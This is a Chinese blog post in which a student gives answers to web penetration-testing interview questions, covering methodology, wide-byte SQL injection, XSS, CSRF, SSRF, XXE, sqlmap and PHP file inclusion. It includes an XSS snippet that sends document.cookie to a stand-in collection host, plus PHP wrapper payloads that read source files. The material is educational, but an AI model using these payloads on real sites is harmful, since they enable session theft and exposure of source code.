<!DOCTYPE html>
<html lang="zh-Hans">
    <!-- title -->




<!-- keywords -->




<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="author" content="S1xHcL">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="S1xHcL">
    
    <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content="万般皆苦 唯有自渡">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <title>知道创宇面试题归档 · S1xHcL&#39;s Blog</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href="/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link rel="stylesheet" href="/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href="/assets/Satamoto.ico">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script">
    <link rel="preload" href="/scripts/main.js" as="script">
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin>
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin>
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
</head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/" >S1xHcL&#39;s Blog</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">知道创宇面试题归档</a>
            </div>
    </div>
    
    <a class="home-link" href=/>S1xHcL's Blog</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(https://source.unsplash.com/random)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            知道创宇面试题归档
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                    <div class= post-intro-tags >
    
        <a class="post-tag" href="javascript:void(0);" data-tags = "Interview">Interview</a>
    
        <a class="post-tag" href="javascript:void(0);" data-tags = "Work">Work</a>
    
</div>
                
                
                    <div class="post-intro-read">
                        <span>字数统计: <span class="post-count word-count">3.9k</span>阅读时长: <span class="post-count reading-time">14 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2019/06/20</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <h1 id="0x01-前言"><a href="#0x01-前言" class="headerlink" title="0x01 前言"></a>0x01 前言</h1><p>大三马上就要结束了，这段时间开始为找实习工作费心思，学院里面安排的实习企业没一个是自己感兴趣的， 正在头疼的时候突然收到了来自BOSS直聘上的交谈，“知道创宇”邀请我去面试？？打起十二分精神准备这次面试。</p>
<p>该套面试题是google到的，但没有答案，正好借此机会学习并完成。</p>
<h1 id="0x02-正题"><a href="#0x02-正题" class="headerlink" title="0x02 正题"></a>0x02 正题</h1><h2 id="1-给你一个网站，你有什么渗透思路"><a href="#1-给你一个网站，你有什么渗透思路" class="headerlink" title="1. 给你一个网站，你有什么渗透思路"></a>1. 给你一个网站，你有什么渗透思路</h2><blockquote>
<p>在获得授权的情况下</p>
</blockquote>
<h3 id="Answer-1"><a href="#Answer-1" class="headerlink" title="Answer 1"></a>Answer 1</h3><ol>
<li>信息收集</li>
</ol>
<ul>
<li>获取域名的whois信息，获得注册者的姓名、邮箱、电话等 </li>
<li>查询服务器旁站以及子域名站点，因为主站的一般比较难，所以先看看旁站有没有通用型的cms 或者其他漏洞 </li>
<li>查看服务器操作系统版本，web中间件，看看是否存在已知的漏洞，比如说 IIS、Apache、 Nginx的解析漏洞 </li>
<li>查看ip，对ip地址的端口扫描，对响应的端口进行漏洞探测，比如说 rsync、心脏滴血、 MySQL，FTP，SSH弱口令 </li>
<li>扫描网站目录结构，看看是否可以遍历目录，或者敏感文件泄露，比如说php探针 google hack 进一步探测网站的信息，后台，敏感文件等</li>
</ul>
<ol start="2">
<li>漏洞扫描</li>
</ol>
<ul>
<li>检测漏洞，如： XSS、CSRF、SQL注入、代码执行、命令执行、越权访问、目录读取、任意文件下载、文件包含、远程命令执行、弱口令、任意文件上传、编辑器漏洞、暴力破解</li>
</ul>
<ol start="3">
<li>漏洞利用</li>
</ol>
<ul>
<li>利用上述方法拿到webshell，或者其他权限</li>
</ul>
<ol start="4">
<li>权限提升</li>
</ol>
<ul>
<li><p>Windows下： </p>
<ul>
<li>mysql的 udf 提权</li>
<li>serv-u 提权</li>
<li>Windows低版本的漏洞，比如 iis 6.0 ，pr</li>
</ul>
</li>
<li><p>Linux下：</p>
<ul>
<li>Linux脏牛漏洞</li>
<li>Linux内核版本系统漏洞提权</li>
<li>Linux下的mysql system 提权以及 oracle 低权限提权</li>
</ul>
</li>
</ul>
<ol start="5">
<li><p>日志清理</p>
</li>
<li><p>总结报告及修复方案</p>
</li>
</ol>
<h3 id="Answer-2"><a href="#Answer-2" class="headerlink" title="Answer 2"></a>Answer 2</h3><ol>
<li>信息收集</li>
</ol>
<ul>
<li>服务器的相关信息（真实ip、系统类型、版本、开放端口、WAF等）</li>
<li>网站指纹识别（包括 CMS、CDN、证书等），DNS记录</li>
<li>whois信息、姓名、备案、邮箱、电话（邮箱电话丢社工库查询）</li>
<li>子域名收集、旁站查询、C段</li>
<li>google hacking 针对化搜索，PDF文件、中间件版本、弱口令扫描等</li>
<li>扫描网站目录结构，爆后台、网站banner、测试文件、备份等敏感文件泄露</li>
<li>传输协议、通用漏洞、exp、GitHub源码等</li>
</ul>
<ol start="2">
<li>漏洞挖掘</li>
</ol>
<ul>
<li>浏览网站，看看网站规模，特点，功能等</li>
<li>端口、弱口令、目录扫描</li>
<li>XSS、SQL注入、命令注入、CSRF、Cookie安全检测、敏感信息、通信数据传输、暴力破解、任意文件上传、越权访问、未授权访问、目录遍历、文件包含、重放攻击（短信/邮箱轰炸），服务器漏洞检测，最后使用漏洞扫描工具</li>
</ul>
<ol start="3">
<li>漏洞利用 | 权限提升</li>
</ol>
<ul>
<li>mysql 提权 udf</li>
<li>serv-u 提权</li>
<li>Linux内核版本提权</li>
</ul>
<ol start="4">
<li>清楚测试数据 | 输出报告</li>
</ol>
<ul>
<li>日志、测试数据的清理</li>
<li>总结，输出渗透测试报告，附修复方案</li>
</ul>
<ol start="5">
<li>复测</li>
</ol>
<ul>
<li>验证并发现是否有新漏洞，输出报告，归档</li>
</ul>
<h2 id="2-MySQL-5-0版本前后有什么区别"><a href="#2-MySQL-5-0版本前后有什么区别" class="headerlink" title="2. MySQL 5.0版本前后有什么区别"></a>2. MySQL 5.0版本前后有什么区别</h2><ul>
<li>5.0 以下没有 information_schema 这个系统表，无法列表明等，只能暴力跑表名</li>
<li>5.0 以下是多用户单操作，5.0 以上是多用户多操作</li>
</ul>
<h2 id="3-宽字节注入理解和利用"><a href="#3-宽字节注入理解和利用" class="headerlink" title="3. 宽字节注入理解和利用"></a>3. 宽字节注入理解和利用</h2><h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p>GB2312、GBK、GB18030、BIG5、Shift_JIS 等这些都是常说的宽字节，实际上只有两个字节。宽字节带来的安全问题主要是吃 ASCII 字符（一字节）的现象。</p>
<blockquote>
<p> <code>%df&#39;</code> 被PHP转义（开启GPC，用addslashes函数，或者icov等），单引号被加上反斜杠 <code>\</code> ，变成了 <code>%df\&#39;</code> ，其中 <code>\</code> 的十六位进制是 <code>%5C</code> ，那么现在 <code>%df\&#39; = %df%5C%27</code> ，如果程序的默认字符集是 <code>GBK</code> 等宽字节字符集，则MySQL在用GBK编码是，会认为 <code>%df%5C</code> 是一个宽字符，也就是 <code>運</code> ，也就是说： %df’ = %df%5C%27 = 縗’ ，有了单引号就好注入了。</p>
</blockquote>
<h3 id="理解"><a href="#理解" class="headerlink" title="理解"></a>理解</h3><p>为什么加一个 <code>%df</code> 就可以了？</p>
<blockquote>
<p>因为这是MySQL的一个特性，GBK为多字节编码，它认为两个字节代表一个汉字，在 %df 加入的时候会和 <code>转义符 \</code> ，即和 %5C 进行结合，变成了一个 “運” ，而 ‘ 已经绕过限制</p>
</blockquote>
<h3 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h3><p>只要第一个字节和 <code>%5C</code> 结合成是一个汉字，就可以成功绕过，只要第一个字节的 <code>ASCII值大于128</code> ，就可以了</p>
<h3 id="防范"><a href="#防范" class="headerlink" title="防范"></a>防范</h3><ol>
<li>统一字符编码，使用 mysql_set_charset ： 指定字符集</li>
<li>使用 mysql_real_escape_string 进行转义，与 addslashes 不同，前者会考虑当前设置的字符集（mysql_set_charset），不会出现将 e5 和 5c 拼接。 （注： iconv也会出现宽字节，例如 錦’ 的GBK编码为 0xe55C，所以就能发现后面为 %5C%27，这个时候出现两个 %5C ，刚好 \ ，反斜杠被转义，导致 ‘ 绕过造成注入）</li>
</ol>
<h2 id="4-XSS成因及防护措施"><a href="#4-XSS成因及防护措施" class="headerlink" title="4. XSS成因及防护措施"></a>4. XSS成因及防护措施</h2><h3 id="原因"><a href="#原因" class="headerlink" title="原因"></a>原因</h3><p>过度信任用户，对用户输入的内容过滤不足，构造特定的JS脚本插入到文本框可引发xss，会被浏览器解析，执行</p>
<h3 id="防护"><a href="#防护" class="headerlink" title="防护"></a>防护</h3><ol>
<li>对前端输入做过滤和编码</li>
</ol>
<p>比如说只允许输入特定的类型的字符，例电话号格式，注册用户名限制，输入检测需要在服务器端完成，在前端完成的限制是容易绕过的</p>
<ol start="2">
<li>对输出做过滤和编码</li>
</ol>
<p>在变量值输出到前端的HTML时进行编码和转义</p>
<ol start="3">
<li>给关键cookie使用 http-only</li>
</ol>
<h2 id="5-DOM型XSS"><a href="#5-DOM型XSS" class="headerlink" title="5. DOM型XSS"></a>5. DOM型XSS</h2><blockquote>
<p>DOM型XSS是基于文档对象模型的一种XSS</p>
</blockquote>
<h3 id="原理-1"><a href="#原理-1" class="headerlink" title="原理"></a>原理</h3><p>DOM型XSS严格来说应该归属到反射型XSS，因为它并没有将恶意代码存储到数据库内。</p>
<p>在网站页面中有许多页面的元素，当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象，接着生成各个子文档对象，每个页面元素对应一个文档对象，每个文档对象包含属性、方法和事件。可以通过JS脚本对文档对象进行编辑从而修改页面的元素。也就是说，客户端的脚本程序可以通过DOM来动态修改页面内容，从客户端获取DOM中的数据并在本地执行。基于这个特性，就可以利用JS脚本来实现XSS漏洞的利用。</p>
<h3 id="触发"><a href="#触发" class="headerlink" title="触发"></a>触发</h3><ol>
<li>document.referer 属性</li>
<li>window.name 属性</li>
<li>location 属性</li>
<li>innerHTML 属性</li>
<li>documnt.write 属性</li>
</ol>
<h3 id="防护-1"><a href="#防护-1" class="headerlink" title="防护"></a>防护</h3><p>DOM型XSS主要是由客户端的脚本通过DOM动态地输出数据到页面上，而不是依赖于数据提交给服务器端，而从客户端活动DOM中的数据在本地执行，因而仅从服务器端是无法防御的。其防御在于： </p>
<ol>
<li>避免客户端文档重写、重定向或其他敏感操作，同时避免使用客户端数据，这些操作尽量在服务器端使用动态页面来实现。</li>
<li>分析和强化客户端JS代码，特别是受到用户影响的DOM对象，注意能直接修改DOM和创建HTML文件的相关函数或方法，并在输出变量到页面时先进行编码转义，如输出到HTML则进行HTML编码；输出到 <code>&lt;script&gt;</code> 则进行JS编码。</li>
</ol>
<h2 id="6-CSRF的成因及防护措施"><a href="#6-CSRF的成因及防护措施" class="headerlink" title="6. CSRF的成因及防护措施"></a>6. CSRF的成因及防护措施</h2><h3 id="本质"><a href="#本质" class="headerlink" title="本质"></a>本质</h3><p>CSRF 的本质就是 XSS</p>
<h3 id="原因-1"><a href="#原因-1" class="headerlink" title="原因"></a>原因</h3><p>CSRF漏洞的成因是网站的cookie在浏览器中不会过期，只要不关闭浏览器或者退出登录，那以后只要访问这个网站，都默认你已经登录的状态。而在这个期间，攻击者发送构造好的CSRF脚本或者包含CSRF脚本的链接，可能会执行一些用户不想做的功能，而这个操作并不是用户真正想要执行的。</p>
<h3 id="防护-2"><a href="#防护-2" class="headerlink" title="防护"></a>防护</h3><ol>
<li>添加 token 并验证</li>
<li>验证 HTTP Referer 字段</li>
<li>在 HTTP 头中自定义属性并验证</li>
<li>验证码</li>
</ol>
<h2 id="7-同源策略"><a href="#7-同源策略" class="headerlink" title="7. 同源策略"></a>7. 同源策略</h2><p>为了防止不同域在用户浏览器中彼此干扰，浏览器对从不同来源（域）收到的内容进行隔离。<br>浏览器不允许任何旧有脚本访问一个站点的cookie，否则，会话容易被劫持。<br>只要发布cookie的站点能访问这些cookie，只要通过该站点返回的页面所包含或加载的JavaScript才能访问cookie</p>
<p>协议相同、域名相同、端口相同</p>
<h2 id="8-SSRF"><a href="#8-SSRF" class="headerlink" title="8. SSRF"></a>8. SSRF</h2><h3 id="原理-2"><a href="#原理-2" class="headerlink" title="原理"></a>原理</h3><p>SSRF（服务器端请求伪造）是一种由攻击者构造形成由服务器发起请求的一个安全漏洞。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统</p>
<h3 id="防御"><a href="#防御" class="headerlink" title="防御"></a>防御</h3><p>SSRF统一信息错误，避免用户可以根据错误信息来判断远程服务端口状态</p>
<ol>
<li>限制请求的端口为HTTP常用的端口，比如80，443,8080,8088等</li>
<li>黑名单内网IP</li>
<li>禁用不需要的协议，仅仅允许HTTP和HTTPS</li>
</ol>
<h2 id="9-XXE"><a href="#9-XXE" class="headerlink" title="9. XXE"></a>9. XXE</h2><h3 id="起因"><a href="#起因" class="headerlink" title="起因"></a>起因</h3><p>引用外部实体 <code>&lt;!ENTITY 实体名称 SYSTEM &quot;URL&quot;&gt;</code> 或者 <code>&lt;!ENTITY 实体名称 PUBLIC &quot;public_ID&quot; &quot;URL&quot;&gt;</code><br>当允许使用外部实体时，通过构成恶意内容可读取任意文件、执行系统命令、探测内网端口、攻击内网网站等违害。<br>（XXE是XML外部实体注入攻击，XML中可以通过调用实体来请求本地或者远程内容，与远程文件保护类型，会引发相关安全问题）</p>
<blockquote>
<p>除PHP外，在Java、Python、等处理xml的组件及函数中都可能存在此问题</p>
</blockquote>
<h3 id="防御-1"><a href="#防御-1" class="headerlink" title="防御"></a>防御</h3><ol>
<li>使用开发语言提供的禁用外部实体的办法</li>
</ol>
<p>libxml_disable_entity_loader(true);</p>
<ol start="2">
<li>过滤用户提交的XML数据</li>
</ol>
<ul>
<li>检查所使用的底层xml解析库，默认进制外部实体的解析</li>
<li>使用第三方应用代码及时升级补丁</li>
<li>同时增强对系统的监控，防止此问题被人利用</li>
<li>对于PHP，由于 simplexml_load_string 函数的xml解析问题出现在libxml库上，所以加载实体前可以调用函数过滤</li>
</ul>
<h2 id="10-XSS窃取Cookie过程"><a href="#10-XSS窃取Cookie过程" class="headerlink" title="10. XSS窃取Cookie过程"></a>10. XSS窃取Cookie过程</h2><p>脚本端： </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line">document.write(&apos;&lt;img scr=&quot;http://ip/cookie.php?cookie=&apos;+docoument.cookie+&apos;&quot; width=0 height=0 border=0 /&gt;&apos;)</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>获取的 cookie 后，用 FireBug 找到 cookie，新建cookie，加入 cookie ，用 Referer 来提交，无需输入账号密码直接登录进去。</p>
<h2 id="11-sqlmap-参数"><a href="#11-sqlmap-参数" class="headerlink" title="11. sqlmap 参数"></a>11. sqlmap 参数</h2><h3 id="Get型"><a href="#Get型" class="headerlink" title="Get型"></a>Get型</h3><p>sqlmap -u “URL”</p>
<h3 id="Post型"><a href="#Post型" class="headerlink" title="Post型"></a>Post型</h3><p>sqlmap -u “URL” –data=”post的参数”</p>
<h3 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h3><p>如果是cookie，x-forwarded-for等，可以访问的时候，用 burpsuite 抓包，注入处用 * 号替换，放到文件里，然后使用 <code>sqlmap -r &quot;file.txt&quot;</code> </p>
<h3 id="补充"><a href="#补充" class="headerlink" title="补充"></a>补充</h3><p>sqlmap中还有很多强大的脚本，建议多看看和学习，关于过 Waf 最好还是根据过滤规矩自行编写相对应的脚本</p>
<h2 id="12-提权方式（window下）"><a href="#12-提权方式（window下）" class="headerlink" title="12. 提权方式（window下）"></a>12. 提权方式（window下）</h2><h3 id="本地提权"><a href="#本地提权" class="headerlink" title="本地提权"></a>本地提权</h3><p>查看目标机安装的补丁，查找最新的exp利用</p>
<p>常用命令：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">systemifo 获取系统配置信息  </span><br><span class="line">wmic os get caption 获取系统版本</span><br><span class="line">wmic qfe get Description,HotFixID,InstalledOn 枚举安装的补丁  </span><br><span class="line">powershell Get-HotFix 利用powershell获取安装的补丁</span><br><span class="line">powershell &quot;Get-WmiObject -Class Win32_Product | Select-Object -Property Name&quot; 获取安装的软件</span><br></pre></td></tr></table></figure>

<h3 id="常见服务器提权"><a href="#常见服务器提权" class="headerlink" title="常见服务器提权"></a>常见服务器提权</h3><p>udf 提权，serv-u 提权</p>
<h2 id="13-登录页面-购物系统存在的逻辑漏洞"><a href="#13-登录页面-购物系统存在的逻辑漏洞" class="headerlink" title="13. 登录页面. 购物系统存在的逻辑漏洞"></a>13. 登录页面. 购物系统存在的逻辑漏洞</h2><ol>
<li>暴力破解用户名密码</li>
<li>撞库</li>
<li>验证码爆破、绕过</li>
<li>手机号撞库</li>
<li>账户权限绕过</li>
</ol>
<h2 id="14-PHP常见的导致文件包含函数"><a href="#14-PHP常见的导致文件包含函数" class="headerlink" title="14. PHP常见的导致文件包含函数"></a>14. PHP常见的导致文件包含函数</h2><h3 id="原因-2"><a href="#原因-2" class="headerlink" title="原因"></a>原因</h3><p>文件包含函数加载的参数没有经过过滤或者严格的定义，可以被用户控制，包含其他恶意文件，导致执行了非预期的代码</p>
<h3 id="include"><a href="#include" class="headerlink" title="include()"></a>include()</h3><p>如果出错，只会提出警告，会继续执行后续语句</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">	$file = $_GET[&apos;file&apos;];</span><br><span class="line">	include $file;</span><br><span class="line">	echo &quot;after error happen!&quot;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h3 id="require"><a href="#require" class="headerlink" title="require()"></a>require()</h3><p>如果在包含的过程中有错，比如文件不存在等，则会直接退出，不执行后续语句</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">	$file = $_GET[&apos;file&apos;];</span><br><span class="line">	require $file;</span><br><span class="line">	echo &quot;after error happen!&quot;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h3 id="include-once"><a href="#include-once" class="headerlink" title="include_once()"></a>include_once()</h3><p>与 <code>include</code> 类似，唯一区别是如果该文件中的代码已经被包含，则不会再次包含</p>
<h3 id="require-once"><a href="#require-once" class="headerlink" title="require_once()"></a>require_once()</h3><p>与 <code>require</code> 类似，唯一区别是如果该文件中的代码已经被包含，则不会再次包含</p>
<h2 id="15-PHP文件包含利用的技巧"><a href="#15-PHP文件包含利用的技巧" class="headerlink" title="15. PHP文件包含利用的技巧"></a>15. PHP文件包含利用的技巧</h2><h3 id="PHP伪协议"><a href="#PHP伪协议" class="headerlink" title="PHP伪协议"></a>PHP伪协议</h3><blockquote>
<p>php://input</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=php://input</span><br><span class="line">——————————————————————————</span><br><span class="line">POST:</span><br><span class="line">&lt;? phpinfo()?&gt;</span><br></pre></td></tr></table></figure>

<blockquote>
<p>php://filter</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=php://filter/read=convert.base64-encode/resource=index.php</span><br></pre></td></tr></table></figure>

<h3 id="Base64解密"><a href="#Base64解密" class="headerlink" title="Base64解密"></a>Base64解密</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt;&gt; import base64</span><br><span class="line">&gt;&gt;&gt; base64.b64decode(&quot;PD9waHAgDQoJJGZpbGUgPSAkX0dFVFsnZmlsZSddOw0KCWluY2x1ZGUgJGZpbGU7DQo/Pg==&quot;)</span><br><span class="line">b&quot;&lt;?php \r\n\t$file = $_GET[&apos;file&apos;];\r\n\tinclude $file;\r\n?&gt;</span><br></pre></td></tr></table></figure>

<h3 id="其他姿势"><a href="#其他姿势" class="headerlink" title="其他姿势"></a>其他姿势</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=php://filter/convert.base64-encode/resource=index.php</span><br></pre></td></tr></table></figure>

<h2 id="16-python有什么成果"><a href="#16-python有什么成果" class="headerlink" title="16. python有什么成果"></a>16. python有什么成果</h2><p>请自行根据自身情况回答</p>
